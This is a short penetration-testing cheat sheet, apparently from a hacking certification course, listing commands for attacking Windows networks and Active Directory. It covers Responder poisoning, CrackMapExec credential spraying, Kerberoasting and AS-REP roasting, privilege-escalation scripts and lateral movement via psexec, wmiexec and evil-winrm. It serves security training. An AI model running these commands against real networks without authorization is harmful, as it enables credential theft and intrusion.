CertifiedHacker

Cheat Sheet: Network & AD

The most commonly used commands from Part II.

Initial Access

# Responder (LLMNR/NBT-NS poisoning)
responder -I eth0 -dwP

# CrackMapExec
crackmapexec smb 10.10.10.0/24 -u user -p password
crackmapexec smb target -u user -p pass --shares

Enumeration

# BloodHound
bloodhound-python -d domain.local -u user -p pass -c All
# Enum4linux
enum4linux -a target
# LDAP
ldapsearch -x -H ldap://dc -b "DC=domain,DC=local"

Kerberos

# Kerberoasting
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request
# AS-REP Roasting
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP

Privilege Escalation

# Windows
winPEAS.exe
whoami /priv
# Linux
linpeas.sh
sudo -l

Lateral Movement

# PSExec
psexec.py domain/admin:pass@target
# WMI
wmiexec.py domain/admin:pass@target
# Evil-WinRM
evil-winrm -i target -u admin -p pass